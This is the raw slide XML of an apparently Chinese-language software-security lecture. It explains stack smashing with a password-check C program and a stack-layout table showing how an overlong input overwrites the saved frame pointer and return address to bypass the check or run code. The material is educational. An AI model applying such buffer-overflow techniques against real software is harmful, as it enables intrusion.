          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4724400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="492125">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>存储</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Password (12 Bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“123456789012”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8313">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>EBP – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>帧指针</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>main (4 bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“3456”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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="468313">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者的返回地址</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>– main (4 Bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>“W►*!”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> (return to line 7 was line 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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="719138">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>存储</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>PwStatus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> (4 bytes)</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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="541338">
                <a:tc>
                  <a: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zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>调用者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>EBP – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>帧指针</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>OS (4 bytes)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9263">
                <a:tc>
                  <a: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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> main</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>的返回地址</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>– OS (4 Bytes)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9956" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6305550" y="1447800"/>
            <a:ext cx="44291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zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="295111" name="Group 199"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="2971800"/>
          <a:ext cx="3733800" cy="2691131"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3048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180975">
                <a:tc>
                  <a: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endParaRPr kumimoji="0" lang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="宋体" charset="0"/>
                        <a:cs typeface="宋体"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600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Statement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0513">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>puts("Enter Password:");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913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>PwStatus=ISPasswordOK();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6225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0033CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>if</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> (PwStatus == </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0033CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>true</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="292100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>  puts("Access denied");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315913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>  exit(-1);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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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504825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="ct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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体"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1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0033CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>else </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>puts("Access granted");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9986" name="Text Box 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="5867400"/>
            <a:ext cx="876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zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>这个漏洞还可以被用于执行包含在输入字符串中的任意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D21C09B4-D851-4043-BACE-08EB012A6BE7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4141818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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈粉碎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>这是一种很严重的漏洞，因为它会对程序的可靠性和安全性造成严重的后果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当缓冲区溢出覆写分配给执行栈内存中的数据时，就会导致栈粉碎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>成功的利用这个漏洞能够覆写栈返回地址，从而在目标机器中执行任意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1236676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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="2343575"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击者创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意参数</a:t>
            </a:r>
